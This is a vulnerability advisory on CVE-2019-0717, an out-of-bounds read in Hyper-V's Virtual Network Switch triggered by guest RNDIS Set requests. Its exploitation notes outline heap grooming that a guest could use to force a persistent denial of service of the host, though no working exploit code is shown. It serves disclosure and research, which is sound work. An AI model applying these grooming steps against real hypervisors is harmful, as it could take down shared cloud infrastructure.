Microsoft Hyper-V Virtual Network Switch VmsMpCommonPvtSetRequestCommon Out of Bounds Read

February 15th, 2021 – Alisa Esage

Hyper-V relies on a component named Virtual Network Switch to provide various networking services to virtual machines. Virtual Network Switch (vmswitch.sys) is an RNDIS-compliant virtual device that lives in the kernel of the root partition. It is directly exposed to Generation 2 VMs as a paravirtualized virtual ethernet controller, and in Generation 1 VMs it is utilized indirectly by serving as a backend for the emulated DEC ethernet controller. In all cases, vmswitch is the bigbone behind everything networking in a Hyper-V cloud, from providing internet connectivity and virtual LAN to VMs, to bridging all that into physical ethernet adapters on the host.

Generation 2 VMs talk to the vmswitch directly by sending RNDIS protocol data and networking streams over the VMBUS. The vmswitch.sys module in the root partition listens to data availability on the VMBUS in a DPC thread on Windows, that would be woken up with a synthetic interrupt generated by the VM. The RNDIS protocol data provided by VM is then parsed and scheduled for processing in respective subsystems of the virtual device.

When vmswitch receives an RNDIS message of type Set, and after a series of data sanitizations, VmsMpCommonPvtSetRequestCommon() procedure will be eventually called to process it. Inside VmsMpCommonPvtSetRequestCommon one particular path is responsible for handling RNDIS Set requests with OID RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER:

At the start of the above code snippet, $r9 register points to InformationBuffer of type rndis_config_parameter_info:

/* Linux Integration Services */
/* Format of Information buffer passed in a SetRequest for the OID */
/* OID_GEN_RNDIS_CONFIG_PARAMETER. */
struct rndis_config_parameter_info {
  u32 parameter_name_offset;
  u32 parameter_name_length;
  u32 parameter_type;
  u32 parameter_value_offset;
  u32 parameter_value_length;
};

The contents and the length of this data are fully controlled by the VM.

The four checks in the above snippet correctly validate that the data offsets provided by rndis_config_parameter_info members fall within the bounds of the request. However, there is a narrow edge case which is not validate. When memcmp() is finally called at 00000001C001FB6E with a static length value of 0x1c, $r15 points to a VM-controlled value of parameter_name, that can be smaller than 0x1c. In case that parameter_name is smaller than 0x1c and also falls at the end of the allocated memory page which is adjacent to unallocated space, the root partition OS will bugcheck due to a read access violation.

Potential impact of this bug is a persistent DoS of the entire Hyper-V cloud. Exploitation is not straightforward, and the heap must be groomed specifically in order to crash a vulnerable Hyper-V host in the absence of specialized debugging instrumentation.

Exploitation notes

It is theoretically possible to exploit this issue without the Driver Verifier enabled, and cause a persistent DoS in the Hyper-V root partition OS from an arbitrary Guest OS and in default configuration.

First, note that a Guest VM has a significant degree of control over memory management in vmswitch. For example, consider the output from !verifier on the faulting memory:

RndisDevHostDispatchControlMessage in the allocation backtrace is the top-level function that dispatches RNDIS requests from the guest. For each incoming request it allocates memory based on the size of the request, as it is provided by the Guest VM. Thus the Guest VM controls both the timing and the size of memory allocations in vmswitch, which is conductive to heap grooming.

It is not clear whether the Guest VM has the same degree of control over freeing of memory. The memory allocated for a request is freed once vmswitch has finished processing it. However, a free() primitive may be synthetically constructed (at least) by exploiting the fact that some RNDIS requests may take longer to process than the others.

The general idea of exploitation is to create an alternating pattern of two types of memory pages: one, which is groomed such that our malicious request is the last byte sequence in the memory page; and another one, which is either free or may be predictably free'd by the VM.

Type 1 page may be crafted by first flushing the look-aside and freelists in the Windows kernel by sendins lots of small RNDIS requests of apropriate sizes, that will trigger the allocation of a new memory page; and then occupying the new page with small allocations in a controlled manner.

Type 2 page seems trickier to construct due to both limitations of the attacker's control over memory freeing, and KASLR mitigations. However I expect that an unallocated memory page may happen naturally following the Type 0 page in certain conditions, due to KASLR.

After the host BSODs and reboots, the Guest VM will start automatically, and run the exploit again. Thus a persistent DoS of the Hyper-V cloud may be achieved.

This vulnerability and the relevant technical architectural context is further discussed in the "Hypervisor Exploitation I" training.

CVE ID: CVE-2019-0717
Proof-of-concept testcase
Vulnerability discovery: Alisa Esage, Zero Day Engineering

Categories: Vulnerability, Virtualization

Research Training